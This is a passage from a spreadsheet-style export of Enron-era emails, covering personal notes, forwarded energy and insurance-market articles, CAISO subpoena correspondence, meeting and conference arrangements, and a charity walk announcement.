ing Date: January 16, 2002  Filer: NATURE CONSERVANCY Relation:   Stock Nam=_x000D_
e: QUALCOMM INC Stock CUSIP: 747525103  Stock Symbol: QCOM Exchange: NASDAQ=_x000D_
  Transaction date: December 11, 2001 Shares for sale: 200 Value held: $125=_x000D_
00  Broker: SALOMON SMITH BARNEY INC  Copyright (c) 2002, Vickers Stock Res=_x000D_
earch Corporation. All rights reserved.  -0-       [IMAGE]    ***IMPORTANT =_x000D_
NOTICE AND DISCLAIMER REGARDING THIS COURTESY EMAIL***  At your request, as=_x000D_
 a subscriber to our service, this email alert is being sent to you as a co=_x000D_
urtesy and is for information purposes only. We are a financial news re-dis=_x000D_
tributor. We are not an investment advisory and do not purport to tell or s=_x000D_
uggest which companies you should monitor or which securities you should pu=_x000D_
rchase or sell.   In addition, not withstanding our policy of prohibiting e=_x000D_
mployees from buying or selling securities of an advertising company for a =_x000D_
period of 20 days following dissemination of the advertisement, we may not =_x000D_
be able to effectively monitor our employees to ensure compliance with the =_x000D_
same. Consequently, there may be sales and/or purchases of such securities =_x000D_
by our employees prior to, during and immediately following the disseminati=_x000D_
on of the advertisement.   Please note that (1) this email may not contain =_x000D_
the full text of the press release issued by, or the research or other repo=_x000D_
rts regarding, the Monitored Company; and (2) the text of the advertisement=_x000D_
, the press release and/or reports were obtained from third party sources a=_x000D_
nd were not written, generated or edited by us; accordingly, we make no rep=_x000D_
resentations or give any assurance as to the accuracy or completeness, nor =_x000D_
have we conducted any independent investigations of, the disclosures regard=_x000D_
ing the subject matter of such releases and reports.   Please note that lin=_x000D_
ks to the advertising company and/or Monitored Company are provided for you=_x000D_
r convenience. We assume no obligation for the content of such sites.   All=_x000D_
 information contained herein should be independently verified by you with =_x000D_
the advertising company or with Monitored Company or any other sources you =_x000D_
prefer.   [THIS IS ONLY A SUMMARY OF, AND IS QUALIFIED IN ITS ENTIRETY BY R=_x000D_
EFERENCE TO, THE "EQUITYALERT SUBSCRIBER AGREEMENT AND DISCLAIMER." PLEASE =_x000D_
VISIT http://www.equityalert.com/home/disclaim.asp  FOR ACCESS TO OUR COMPL=_x000D_
ETE DISCLAIMER]        =09  [IMAGE] [IMAGE] [IMAGE] [IMAGE]   [IMAGE] [IMAG=_x000D_
E] [IMAGE]  [IMAGE] [IMAGE] [IMAGE] Stock  Quote [IMAGE]   [IMAGE] Stock  C=_x000D_
hart [IMAGE]   [IMAGE] Covered  Calls  [IMAGE]   [IMAGE] Company  Profile [=_x000D_
IMAGE]   [IMAGE] [IMAGE]  [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE]  =_x000D_
 [IMAGE] [IMAGE] [IMAGE] Option  Details  [IMAGE]   [IMAGE] Black  - Schole=_x000D_
s [IMAGE]     [IMAGE]  Power Option PLUS Logo    [IMAGE] [IMAGE] [IMAGE] [I=_x000D_
MAGE] [IMAGE] [IMAGE]   =09_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 05:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'howton.k@ghc.org'})</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Gerald,_x000D_
_x000D_
Our last night in Cabo was actually very low key.  We did end up going to the _x000D_
Giggling Marlin and guess what???  I was called up to do the whole dance _x000D_
thing!  And luckily I was paired with a tall man ( who's girlfriend was in _x000D_
the audience... ) and we actually did pretty good together.  And what was _x000D_
even funnier was that I ended up dancing with a "little Amigo" all night.  He _x000D_
was about 4 foot 2 inches tall!  Barely came up to my chest and he was loving _x000D_
it!  And I was okay with all of it as it kept me safe!  I did not have you _x000D_
there to ward off all the weirdo's!!!  But we did have fun..._x000D_
_x000D_
Good to hear that you made it back in one piece.  The plane ride back was fun _x000D_
as we had the back of the airplane to ourselves so we just sat in the back _x000D_
and giggled about everything that happen on our trip!  We have great memories _x000D_
and I feel very fortunate to have met you the first night!  You and I must _x000D_
have had good karma to meet up like we did..._x000D_
_x000D_
I too am just a tad bit slammed!  Luckily my support checked my e-mail and _x000D_
mail so I am not too buried in paperwork!  I just need to check my voice mail _x000D_
and then pick up where I left off a week ago!!!   The only surprise that I _x000D_
came back to was my counter part ( I do Non Medical contracts and Derek does _x000D_
Medical contracts ) has decided to move to Portland with his wife, thus he _x000D_
will be leaving GHC at the end of this month.  Which leaves just me for all _x000D_
of the contracts.  Which is not a big deal as I have already been through _x000D_
this twice before.  Makes for long hours but that is the way that it goes!_x000D_
_x000D_
Off to one more meeting for today...Have a great day and I will talk to you _x000D_
soon..._x000D_
_x000D_
Dee_x000D_
_x000D_
_x000D_
_x000D_
&gt;&gt;&gt; &lt;Gerald.Nemec@enron.com&gt; 09/11/00 04:19PM &gt;&gt;&gt;_x000D_
Hope you had a safe journey back from the land of Cabo.  We made it back_x000D_
without a problem.  I am really getting hammered at work today.  Reality_x000D_
baby!  Apparently my clients just can't do without me._x000D_
_x000D_
What did you guys do on your last night?  Let me guess. El Squid Roe.  Did_x000D_
your partners meet any new family members?_x000D_
_x000D_
I really had a great time hanging out with you.  It made my trip that much_x000D_
more memorable to be with a special person like you.  Drop me a note when_x000D_
you get a chance and let me know how you are._x000D_
_x000D_
Take care,_x000D_
Gerald._x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Apr 2000 09:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CME and CATEX</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/05/2000 _x000D_
04:22 PM ---------------------------_x000D_
_x000D_
_x000D_
Joseph Hrgovcic_x000D_
04/05/2000 04:06 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc: vkaminski@aol.com, Shirley Crenshaw/HOU/ECT@ECT _x000D_
Subject: CME and CATEX_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Joseph Hrgovcic/HOU/ECT on 04/05/2000 _x000D_
04:06 PM ---------------------------_x000D_
_x000D_
_x000D_
Lucy Ortiz_x000D_
04/05/2000 04:02 PM_x000D_
To: Joseph Hrgovcic/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: CME and CATEX_x000D_
_x000D_
Spotlight Report _x000D_
  Exchange products seeing slow trading_x000D_
  GAVIN SOUTER_x000D_
_x000D_
  03/20/2000 _x000D_
  Business Insurance _x000D_
  Page 3 _x000D_
  Copyright (C) 2000 Crain Communications, Inc. All rights_x000D_
  reserved. _x000D_
_x000D_
  Exchange-based insurance products developed in recent years have_x000D_
  been somewhat slow to get off the ground._x000D_
_x000D_
  Although several exchanges have offered derivative contracts since_x000D_
  the mid-1990s to cover insurance risks, none so far has posted a_x000D_
  significant volume of trades._x000D_
_x000D_
  Few insurers, reinsurers or policyholders have been drawn away_x000D_
  from the traditional insurance markets, where capacity remains_x000D_
  abundant and relatively cheap._x000D_
_x000D_
  As long as those traditional markets manage to weather major_x000D_
  natural catastrophes, the allure of the exchange-based products will_x000D_
  remain limited, observers say._x000D_
_x000D_
  Also stifling the growth of the exchange-based contracts is the_x000D_
  limited number of contracts available, one expert noted. Dealers, he_x000D_
  said, are unable to secure a suitable hedge by laying off one_x000D_
  contract against another._x000D_
_x000D_
  Although the various exchanges have had a good opportunity to_x000D_
  establish a widely used set of new risk financing products, that has_x000D_
  not been achieved, said Morton Lane, senior managing director,_x000D_
  capital markets division at Gerling Global Financial Products in_x000D_
  New York._x000D_
_x000D_
  The main problem with the existing exchanges is that they do not_x000D_
  offer a sufficiently diverse array of products, he said. The only way_x000D_
  to control the risks in the catastrophe options is to have a diversified_x000D_
  portfolio of other contracts, and none of the exchanges currently_x000D_
  offers a sufficiently broad range of options to provide for that_x000D_
  hedge, he said._x000D_
_x000D_
  Florida windstorm options, for example, cannot be bought and then_x000D_
  hedged in the same way that International Business Machines Corp._x000D_
  stock options contracts can be hedged with IBM stock, Mr. Lane_x000D_
  explained._x000D_
_x000D_
  The exchanges might be more attractive to investors if, in addition to_x000D_
  natural catastrophe options, they included options on other risks, he_x000D_
  said. Those might include, for example, satellite, aviation and crop_x000D_
  indexes, Mr. Lane said. "For the insurance buyer, such exchange_x000D_
  instruments would not represent the perfect risk transfer vehicle, but_x000D_
  as long as they are quantifiable and indexable, they may represent a_x000D_
  good surrogate," he said._x000D_
_x000D_
  The exchanges could also be used to create a derivatives market for_x000D_
  over-the-counter securitized deals, if there are regular issuers of_x000D_
  catastrophe bonds, Mr. Lane said._x000D_
_x000D_
  The soft insurance market has also hindered the growth of_x000D_
  exchange-based insurance products, said Sean F. Mooney, senior_x000D_
  vp and chief economist at Guy Carpenter &amp; Co., the reinsurance_x000D_
  brokerage unit of Marsh Inc. in New York._x000D_
_x000D_
  "The traditional market has been so competitive that people are not_x000D_
  looking for other ways of doing business," he said._x000D_
_x000D_
  At least in concept, the exchange-based deals are generally similar_x000D_
  to the mortgage-backed securities that have been a huge success_x000D_
  since they were introduced in the 1970s. "There is a belief that_x000D_
  alternative means of transferring risks will grow, but it is difficult to_x000D_
  predict when," Mr. Mooney said._x000D_
_x000D_
  Currently, the trading that is taking place typically involves_x000D_
  established insurers and reinsurers, so the exchanges have not_x000D_
  brought substantial new capacity to the marketplace, he said._x000D_
_x000D_
  Guy Carpenter provided the index for the Bermuda Commodities_x000D_
  Exchange reinsurance products. The BCE did not take off,_x000D_
  however, and was suspended last year after two years of little_x000D_
  activity._x000D_
_x000D_
  The oldest of the insurance-related, exchange-based derivative_x000D_
  products are the catastrophe options traded on the Chicago Board_x000D_
  of Trade, which began trading the options in 1996._x000D_
_x000D_
  Initially, there was substantial interest in the options, but the soft_x000D_
  traditional market has hampered use of the contracts to hedge_x000D_
  catastrophe exposures, said Carlton Purty, an independent broker_x000D_
  at the CBOT who trades in options._x000D_
_x000D_
  No catastrophe option trades have been completed at the CBOT_x000D_
  so far this year, he said. Last year, there was increased interest in_x000D_
  the contracts because of Hurricane Floyd, but few contracts were_x000D_
  traded, Mr. Purty said._x000D_
_x000D_
  "I think a major, major catastrophe will have to happen before they_x000D_
  really take off," he said._x000D_
_x000D_
  The contracts offer real protection, and options dealers are keen to_x000D_
  trade in a new niche, but the conventional insurance and reinsurance_x000D_
  markets are so soft that few companies are turning to alternative_x000D_
  coverage options, Mr. Purty said._x000D_
_x000D_
  The Catastrophe Risk Exchange, located in Princeton, N.J., has_x000D_
  radically changed its structure since it was originally announced in_x000D_
  mid-1996, and it is well positioned to expand, said Frank Sweeney,_x000D_
  chief operating officer._x000D_
_x000D_
  CATEX initially planned to be a computer-based facility for_x000D_
  reinsurers that would enable them to exchange catastrophe risks_x000D_
  and to build balanced portfolios._x000D_
_x000D_
  But by the time the exchange was operational in November 1996, it_x000D_
  was clear that most reinsurers and insurers interested in CATEX_x000D_
  wanted only to buy and sell conventional reinsurance, Mr. Sweeney_x000D_
  said._x000D_
_x000D_
  Although there was some interest in risk swapping, only a handful of_x000D_
  risks were posted on the system, and none was traded, Mr._x000D_
  Sweeney said._x000D_
_x000D_
  Consequently, CATEX has become chiefly a "cash for cover"_x000D_
  exchange, he said, noting that the risks reinsured on the exchange_x000D_
  include property catastrophe coverage, aviation and liability_x000D_
  coverages. CATEX also trades industry loss warranties, where_x000D_
  coverage is triggered by an actual loss combined with an industry_x000D_
  loss over an agreed threshold._x000D_
_x000D_
  Other adjustments to the exchange included making it accessible_x000D_
  through the Internet in November 1998. And late last year, CATEX_x000D_
  offered users the ability to set up smaller networks, allowing them_x000D_
  form groups whose members do business only with one another._x000D_
_x000D_
  Since its inception, CATEX has completed about 450 trades,_x000D_
  totaling $400 million in premium and more than $3 billion in limits,_x000D_
  he said. CATEX's roughly 160 subscribers include reinsurers,_x000D_
  insurers and corporate entities that purchase coverage through their_x000D_
  captives, Mr. Sweeney said._x000D_
_x000D_
  "We obviously have a long way to go, but we are pretty satisfied_x000D_
  with what we have achieved so far," Mr. Sweeney said._x000D_
_x000D_
  The exchange sees increased activity after major losses, as cedents_x000D_
  seek to buy replacement coverage to offset depletions in their_x000D_
  existing cover, he said. For example, Mr. Sweeney said, there was_x000D_
  a flurry of activity after the European windstorms in December last_x000D_
  year._x000D_
_x000D_
  Last September, the Chicago Mercantile Exchange entered the field_x000D_
  of insurance-related derivatives when it began offering weather_x000D_
  derivatives ._x000D_
_x000D_
  Thus far, 420 futures contracts have been traded, said Larry_x000D_
  Grannan, senior director in product marketing at the CME._x000D_
_x000D_
  Such contracts are designed to allow businesses to hedge against_x000D_
  weather-related losses. For example, a utility may sell less power in_x000D_
  a mild winter, and it would be able to use the futures to hedge a_x000D_
  resultant fall in revenues._x000D_
_x000D_
  The exchange first offered heat-based indexes for Atlanta, Chicago,_x000D_
  Cincinnati and New York. In January, it added Philadelphia, Dallas,_x000D_
  Des Moines, Las Vegas, Tucson and Portland, and it began offering_x000D_
  contracts based on cold weather._x000D_
_x000D_
  Currently, most of the trades are between securities dealers_x000D_
  themselves, but, eventually, the contracts will likely be used more_x000D_
  extensively by utilities and insurers, Mr. Grannan said._x000D_
_x000D_
  In addition, the futures contracts could be used as hedges for_x000D_
  over-the-counter securitized deals, he said._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 03:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sbishop@gibbs-bruns.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>Re: CAISO Notice: Message to Market Participants and Scheduling_x000D_
 Coord inators regarding CA ISO compliance with the EOB and CPUC subpoenas_x000D_
 -- FOR YOUR INFORMATION</t>
  </si>
  <si>
    <t xml:space="preserve">Yes we do care.  The question is: are we going to do anything?  Robin and _x000D_
Richard will be discussing this this afternoon._x000D_
_x000D_
The CPUC's motion only applied to the generators, not the ISO.  I guess the _x000D_
ISO was viewed as cooperating._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan J Mara@ENRON_x000D_
12/13/2000 09:56 AM_x000D_
To: Mary Hain/HOU/ECT@ECT, Richard B Sanders/HOU/ECT@ECT, _x000D_
gfergus@brobeck.com, mday@gmssr.com, rcarroll@bracepatt.com, Alan _x000D_
Comnes/PDX/ECT@ECT_x000D_
cc: Jeff Dasovich/NA/Enron@Enron, James D Steffes/NA/Enron@Enron _x000D_
Subject: CAISO Notice: Message to Market Participants and Scheduling Coord _x000D_
inators regarding CA ISO compliance with the EOB and CPUC subpoenas -- FOR _x000D_
YOUR INFORMATION_x000D_
_x000D_
The ISO plans to comply with recent EOB and CPUC subpoenas unless FERC or a _x000D_
court tells them not to.  DO we care about this?_x000D_
_x000D_
Question for  Mary and Ron -- Are they trying to get around the FERC-- given _x000D_
the CPUC's filing there asking for authority to get info?_x000D_
_x000D_
Also, as Mary is aware, the WPTF will be submitting a protest to SCE's _x000D_
request to FERC to have the ISO's MSC release data to SCE that the MSC claims _x000D_
identify those who have abused market power. _x000D_
_x000D_
----- Forwarded by Susan J Mara/NA/Enron on 12/13/2000 09:47 AM -----_x000D_
_x000D_
	"Fuller, Don" &lt;DFuller@caiso.com&gt;_x000D_
	Sent by: "Happ, Susan" &lt;SHapp@caiso.com&gt;_x000D_
	12/13/2000 07:52 AM_x000D_
	Please respond to "Sole, Jeanne"_x000D_
		 _x000D_
		 To: ISO Market Participants _x000D_
&lt;IMCEAEX-_O=CAISO_OU=CORPORATE_CN=DISTRIBUTION+20LISTS_CN=ISO+20MARKET+20PARTI_x000D_
CIPANTS@caiso.com&gt;_x000D_
		 cc: _x000D_
		 Subject: CAISO Notice: Message to Market Participants and Scheduling Coord _x000D_
inators regarding CA ISO compliance with the EOB and CPUC subpoenas_x000D_
_x000D_
_x000D_
To Market Participants and Scheduling Coordinators:_x000D_
_x000D_
The CA ISO believes it has complied with its obligations under CA ISO Tariff_x000D_
section 20.3.4 as to the December 4 EOB subpoena and the September 21 CPUC_x000D_
subpoena.  Our reasoning is explained in the attached letter.  Accordingly,_x000D_
the CA ISO will comply with the EOB and  CPUC subpoenas on December 20_x000D_
unless it receives and order to the contrary from a court or the Federal_x000D_
Energy Regulatory Commission._x000D_
_x000D_
In addition, the CA ISO has received requests from the Federal Energy_x000D_
Regulatory Commission and the state agencies for information on generator_x000D_
unit outages.  This information is not subject to tariff section 20.3.4_x000D_
which protects only Generator Outage programs.  Nonetheless, the CA ISO is_x000D_
providing this notice as a curtesy matter.  The CA ISO will provide the_x000D_
requested information to FERC and the state agencies.  The CA ISO has in the_x000D_
past requested confidential treatment for information on the cause of an_x000D_
outage and projected in service date since this information could be used by_x000D_
Market Participants to manipulate the market, and it will make such a_x000D_
request as to cause and in service dates in the context of the current_x000D_
requests._x000D_
_x000D_
Jeanne M. Sol,_x000D_
Regulatory Counsel_x000D_
California ISO_x000D_
(916) 608-7144_x000D_
_____________________________________________________________________________x000D_
________________________________________x000D_
_x000D_
The Foregoing e-Mail Communication (Together With Any Attachments Thereto)_x000D_
Is Intended For The Designated Recipient(s) Only. Its Terms May Be_x000D_
Confidential And Protected By Attorney/Client Privilege or Other Applicable_x000D_
Privileges.  Unauthorized Use, Dissemination, Distribution, Or Reproduction_x000D_
Of This Message Is Strictly Prohibited._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
 - 12-12letter to genfinal.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 08:12:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tdarton1@san.rr.com'})</t>
  </si>
  <si>
    <t>RE: Meeting in Portland</t>
  </si>
  <si>
    <t xml:space="preserve">Tom:_x000D_
_x000D_
We will look forward to your visit.  I will pull together a group of the folks here that would be involved in such a deal.  Proposed agenda:_x000D_
_x000D_
11:00 - 11:30 Quick Your of Trading Floor (Chris Foster)_x000D_
11:30 - 12:30 Lunch and Veritable Quandary_x000D_
1:00 - 3:00 Conference Room Meeting With Relevant Enron Personnel (Foster, Jeff Richter, Chris Stokley, Stewart Rosman)_x000D_
_x000D_
Chris_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Tom Darton" &lt;tdarton1@san.rr.com&gt;@ENRON [mailto:IMCEANOTES-+22Tom+20Darton+22+20+3Ctdarton1+40san+2Err+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, June 06, 2001 7:35 AM_x000D_
To:	Foster, Chris H._x000D_
Subject:	Meeting in Portland_x000D_
_x000D_
Chris,_x000D_
_x000D_
Good morning.  I have obtained a flight to Portland for Thursday, June 14,_x000D_
2001.  Martin Colby and I will arrive around 10:35 a.m.; our return flight_x000D_
is scheduled for 4:00 p.m.  We look forward to meeting with you.  If there_x000D_
is any problem with this schedule, please let me know._x000D_
_x000D_
Tom._x000D_
_x000D_
_x000D_
*****************************_x000D_
Thomas R. Darton_x000D_
Pilot Power Group, Inc._x000D_
3525 Del Mar Heights Rd., #320_x000D_
San Diego, CA 92130_x000D_
voice: (760) 930-5180_x000D_
direct dial: (858) 967-7003_x000D_
fax: (760) 930-5020_x000D_
*****************************_x000D_
</t>
  </si>
  <si>
    <t>Thu, 23 Mar 2000 00:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'harrisc@mail.utexas.edu'})</t>
  </si>
  <si>
    <t>Re: Application Results</t>
  </si>
  <si>
    <t xml:space="preserve">Dr. Harris:_x000D_
 I would like to thank you for personally taking the time to closely review _x000D_
my application. Though I am disappointed with the results I am still _x000D_
determined to attend The TEXAS Graduate School of Business next year.  I _x000D_
understand how competitive the process has become, but I felt that with my _x000D_
work experiences, recommendations, personality, extracurricular activities, _x000D_
etc. that this would compensate for my disability.  After talking with _x000D_
Professors Titman, Ronn, Brown and Jemison, I was sure that the School was _x000D_
the right place to get the education I was looking for.  _x000D_
  I am still certain that the School is the best place for getting a great _x000D_
graduate-level education, so I want you to know that I am going to do _x000D_
whatever it takes to get in next year.  I plan on taking two or three _x000D_
graduate level finance courses at the University of Houston this Summer and _x000D_
Fall to demonstrate to the Admissions committee that I can compete at the _x000D_
graduate level. I also plan on retaking the GMAT test.  Due to my disability, _x000D_
this will be a monumental task; but I am determined to prove to the Committee _x000D_
that I can be successful at The TEXAS Graduate School of Business.  I would _x000D_
like to come down to Austin this spring to meet with you to further discuss _x000D_
my application file and to personally meet you.   _x000D_
  If you think of anything else I can do to strengthen my overall application _x000D_
file for next year, please let me know.  Take care and hope to hear from you _x000D_
soon._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Ben Rogers_x000D_
  </t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 20:16:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>JDRF Cyber Auction &amp; Update Information</t>
  </si>
  <si>
    <t>This Sunday, October 28th, is the Juvenile Diabetes Research Foundation (JDRF) Walk to Cure Diabetes at Greenspoint Mall at 8:00 a.m.  In preparation for the big event, we have several fun activities scheduled to take place this week as detailed below._x000D_
_x000D_
JDRF Cyber Auction - The Cyber Auction will take place this Wednesday, October 24th, through Thursday, October 25th.  For details please go to the Enron home page and click on JDRF Cyber Auction or click http://ecpdxapps01.enron.net/apps/auction.nsf for the direct link.  The Auction this year is hosted by EGS.  _x000D_
_x000D_
Big E Caf? - This Friday, October 26th, 11:30 - 1:00 p.m. on Andrews Street in front of the Enron Center North building._x000D_
Lunch - Fajita lunch with all the trimmings provided by Taquera del Sol for $5.00._x000D_
Entertainment - Live entertainment provided by Mango Punch._x000D_
JDRF Raffle - Raffle tickets for two roundtrip Continental Airline tickets for $5.00 each.  Raffle tickets for two roundtrip British Airways tickets for $10.00 each.  Winning tickets will be drawn at 2:00 p.m. on Friday, October 26th.  _x000D_
JDRF Bake Sale - Cakes, cookies and Halloween treats will be available for purchase._x000D_
JDRF T-shirt Sale - Enron/JDRF T-shirts will be available for a $25 donation._x000D_
JDRF Sneaker (paper) Sales - The competition continues between business units - sneakers will sale for $5.00 each._x000D_
_x000D_
For those of you that have signed up to join us for the walk, please continue to collect donations and watch your email this week for further information regarding the Walk.  For those of you that have not signed up, please join us for the Walk.  Although we have only a few days remaining until the walk, it is not too late to sign up and join us for this great event.  It only takes a moment to fill out a walk form and you will get an Enron/JDRF T-shirt for collect or donating $25 or more, and will join hundreds of Enron employees and several thousand Houstonians on the Walk.  This event will be a blast.  The Enron tent will be great with lots of good food and entertainment and everyone will have a fun time.  Parking at the walk site will be free._x000D_
_x000D_
If you cannot attend the Walk, please support one of your local walkers, participate in the cyber auction or join us for the Big E Caf? on Friday to participate in some of our other great fundraising activities.  We want to keep our standing as the number one walk team in the Gulf Coast area, Texas, and the entire Southern Region of the U.S., as well as in the top 10 nationally._x000D_
_x000D_
Please contact Janice Riedel at X-37507 or Cathy Phillips at X-36898 to sign up as a walker, make a donation, or ask any questions you may have.  Come join the fun._x000D_
_x000D_
Thank you for your support and generosity._x000D_
_x000D_
Mike McConnell</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 09:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Sounds as if you went to a better show than I did.  The game was very _x000D_
sloppy.  They tied 0-0.  Not too exciting._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jennifer Burns_x000D_
_x000D_
10/12/2000 03:43 PM_x000D_
_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re:  _x000D_
_x000D_
Well......IT WAS GREAT!!!!!! Live was actually better than Counting Crows _x000D_
(Shocking).  How was the Soccer Game?  I owe you dinner.  Thanks again for _x000D_
the tickets._x000D_
_x000D_
_x000D_
_x000D_
John Arnold_x000D_
10/12/2000 03:38 PM_x000D_
To: Jennifer Burns/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
how was the concert?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Feb 2000 00:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'conf@risk.co.uk'})</t>
  </si>
  <si>
    <t>power 2000</t>
  </si>
  <si>
    <t xml:space="preserve">To all whom it may concern:_x000D_
_x000D_
I would like to register my associate Zimin Lu as my guest_x000D_
at Power 2000 conference in Houston in May. Thanks._x000D_
_x000D_
Vince Kaminski_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 02/17/2000 _x000D_
08:04 AM ---------------------------_x000D_
_x000D_
_x000D_
Shirley Crenshaw_x000D_
02/16/2000 12:58 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc: Zimin Lu/HOU/ECT@ECT _x000D_
Subject: power 2000_x000D_
_x000D_
Vince:_x000D_
_x000D_
I tried to register Zimin and they said that you would have to do it - since_x000D_
you are the speaker and the spot is your free spot._x000D_
_x000D_
You can Email them the information.  They will need:_x000D_
_x000D_
Name:   Zimin Lu_x000D_
Title:   Director_x000D_
Company:  Enron Corp._x000D_
Address:  1400 Smith Street EB1967_x000D_
Phone:   713-853-6388_x000D_
Conference Name: Power 2000 - Houston, TX -  May 9 &amp; 10, 2000_x000D_
_x000D_
Email the information to:  conf@risk.co.uk_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Shirley_x000D_
3-5290_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Shirley Crenshaw/HOU/ECT on 02/16/2000 _x000D_
12:54 PM ---------------------------_x000D_
_x000D_
_x000D_
Zimin Lu_x000D_
02/15/2000 02:22 PM_x000D_
To: Shirley Crenshaw/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: power 2000_x000D_
_x000D_
_x000D_
_x000D_
Shirely,_x000D_
_x000D_
_x000D_
Could you register me for the power 2000 conference in Houston as Vince's _x000D_
guest ?_x000D_
Since Vince is a speaker, I can attend for free._x000D_
_x000D_
Zimin_x000D_
_x000D_
_x000D_
To: Zimin Lu/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Re: Power 2000  _x000D_
_x000D_
Zimin,_x000D_
_x000D_
You are the 1st. Feel free to register as my guest._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Zimin Lu_x000D_
02/14/2000 02:59 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Power 2000_x000D_
_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
Could you take me as your guest for the Power 2000 conference if_x000D_
no one has asked already ? _x000D_
_x000D_
There are a few interesting topics I would like to hear._x000D_
_x000D_
Zimin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 18:56:46 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/30/02; HourAhead hour: 21;  HourAhead schedule download failed. Manual intervention required.</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 02:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>HPL Nom for March 22, 2001</t>
  </si>
  <si>
    <t>(See attached file: HPLN0322.xls)_x000D_
_x000D_
 - HPLN0322.xls</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2000 08:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.palmer@enron.com', 'karen.denne@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Electric Restructuring: Despite bad name, restructuring benefiting_x000D_
 some areas</t>
  </si>
  <si>
    <t xml:space="preserve">Not everything is bad in electricity competition._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
---------------------- Forwarded by James D Steffes/HOU/EES on 08/17/2000 _x000D_
03:08 PM ---------------------------_x000D_
From: Margo Reyna@ENRON on 08/17/2000 11:26 AM_x000D_
To: Richard Shapiro/HOU/EES@EES, James D Steffes/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Electric Restructuring: Despite bad name, restructuring benefiting _x000D_
some areas_x000D_
_x000D_
I don't know if you have seen this article, but perhaps it can help provide _x000D_
some ammunition regarding the benefits of restructuring._x000D_
---------------------- Forwarded by Margo Reyna/NA/Enron on 08/17/2000 11:24 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
djcustomclips@djinteractive.com on 08/16/2000 11:13:51 AM_x000D_
Please respond to nobody@mail1.djnr.com_x000D_
To: 200144@mailman.enron.com_x000D_
cc:  _x000D_
Subject: Electric Restructuring: Despite bad name, restructuring benefiting _x000D_
some areas_x000D_
_x000D_
_x000D_
Despite bad name, restructuring benefiting some areas _x000D_
  _x000D_
08/14/2000 _x000D_
The Energy Report _x000D_
(c) Copyright 2000 Pasha Publications, Inc. All Rights Reserved. _x000D_
The recent problems in San Diego and the media attention surrounding the _x000D_
power shortages and retail price spikes leads one to believe the problems are _x000D_
solely the result of restructuring efforts. However, some areas that have _x000D_
"deregulated" don't regret the decision._x000D_
Last week, Pennsylvania Gov. Tom Ridge said that electric competition will _x000D_
save consumers in his state $3 billion by 2001 and increase productivity, _x000D_
employment and personal income by 2004. His comments came as a response to a _x000D_
report recently issued by the state government. _x000D_
The report, prepared by the state Department of Revenue to measure the impact _x000D_
of restructuring on state finances, said that forecast reductions in retail _x000D_
electricity prices will improve the state's economy in several ways._x000D_
By 2004, as a direct result of electric competition, the report says:_x000D_
** The real gross state product will be $1.9 billion, or 0.5%, higher than _x000D_
the baseline;_x000D_
** Overall employment will increase by 0.5%, amounting to 36,400 full-time _x000D_
and part-time jobs, including more than 3,000 manufacturing jobs, nearly _x000D_
7,000 retail-sector jobs, more than 5,000 construction jobs, nearly 2,700 _x000D_
transportation and public utility jobs, and more than 12,000 service-sector _x000D_
jobs;_x000D_
